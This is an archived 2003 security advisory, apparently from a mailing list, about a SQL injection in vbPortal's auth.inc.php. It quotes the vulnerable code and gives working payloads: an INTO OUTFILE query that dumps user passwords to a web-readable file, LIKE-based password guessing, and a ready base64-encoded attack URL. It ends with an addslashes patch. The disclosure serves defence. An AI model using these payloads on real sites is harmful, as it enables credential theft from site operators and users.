Informations : °°°°°°°°°°°°° Language : PHP version : 2.0 alpha 8.1 Website : http://www.vbportal.com Problem : SQL Injection Description : vbPortal is a Portal made to complete vBulletin as a CMS. PHP Code/Location : °°°°°°°°°°°°°°°°°°° auth.inc.php : ----------------------------------------------------------------------------------------- [...] if(isset($admin)) { $admin = base64_decode($admin); $admin = explode(":", $admin); $aid = "$admin[0]"; $pwd = "$admin[1]"; if ($aid=="" || $pwd=="") { $admintest=0; echo "<html>\n"; echo "<title>INTRUDER ALERT!!!</title>\n"; echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n"; echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n"; echo "<font face=\"Verdana\" size=\"+4\"><b>Get Out!</b></font></center>\n"; echo "</body>\n"; echo "</html>\n"; exit; } $result=mysql_query("SELECT password as pwd FROM user WHERE username = '$aid'"); // $result=mysql_query("select pwd from $prefix"._authors." where aid='$aid'"); if(!$result) { echo "Selection from database failed!"; exit; } else { list($pass)=mysql_fetch_row($result); if($pass == $pwd && $pass != "") { $admintest = 1; } } } [...] ----------------------------------------------------------------------------------------- Exploit : °°°°°°° The injection is made by $aid. If the value of $aid is ' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt, the SQL request became : SELECT password as pwd FROM user WHERE username = '' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt' and the passwords of the table user can be writted into UserTable.txt, and is readable on http://[target]/UserTable.txt if the path '/complete/path/' is the right way to the website directory. Passwords can also be cracked using LIKE. For example, to know if the crypted password begon by 'a', you can give to $aid the value ' OR pwd LIKE 'a%. To inject the first and the second possiblities, we have to use $admin like this : base64([VALUETOGIVETO$AID]:1); E.g. : to use the first example, we have to crypt : ' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt:1 in base64, like this : JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE= and to inject this via $admin like this : http://[target]/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE= This will of course work both if magic_quotes_gpc is ON or OFF. Solution : °°°°°°°°° A patch can be found on http://www.phpsecure.info. You just have to replace the line : --------------------- $aid = "$admin[0]"; --------------------- in auth.inc.php by : ------------------------------- $aid = addslashes($admin[0]); ------------------------------- More Details in French : °°°°°°°°°°°°°°°°°°°°°° http://www.phpsecure.info/v2/tutos/vbPortal.txt frog-m@n (http://www.phpsecure.info) _________________________________________________________________
This archive was generated by hypermail 2b30 : Fri Sep 12 2003 - 17:48:37 PDT